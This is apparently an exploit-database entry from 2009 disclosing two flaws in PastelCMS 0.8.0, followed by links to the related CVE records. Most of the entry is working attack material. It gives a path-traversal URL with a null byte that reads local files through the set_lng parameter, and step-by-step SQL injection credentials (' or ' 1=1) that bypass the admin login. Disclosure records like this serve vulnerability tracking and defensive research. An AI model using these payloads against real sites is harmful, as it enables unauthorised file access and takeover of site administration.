Lucene search
SirGodEDB-ID:8502HistoryApr 21, 2009 - 12:00 a.m.
pastelcms 0.8.0 - Local File Inclusion / SQL Injection
2009-04-2100:00:00
SirGod
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
#########################################################################
[+] PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#########################################################################
[+] Download : http://pastel.pri.ee/?id=58
[+] Local File Inclusion
PoC :
http://127.0.0.1/[path]/?set_lng=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection ( Login Bypass)
- Go to :
http://127.0.0.1/[path]/admin.php
- Login as the following :
Username : [REAL ADMIN USERNAME HERE] ' or ' 1=1
Password : anything
#########################################################################
# milw0rm.com [2009-04-21]Related
nvd
nvd
CVE-2009-1404
2009-04-24 14:30:00
CVE-2009-1405
2009-04-24 14:30:00
prion
prion
Sql injection
2009-04-24 14:30:00
Directory traversal
2009-04-24 14:30:00
cvelist
cvelist
CVE-2009-1404
2009-04-24 14:00:00
CVE-2009-1405
2009-04-24 14:00:00
cve
cve
CVE-2009-1404
2009-04-24 14:30:00
CVE-2009-1405
2009-04-24 14:30:00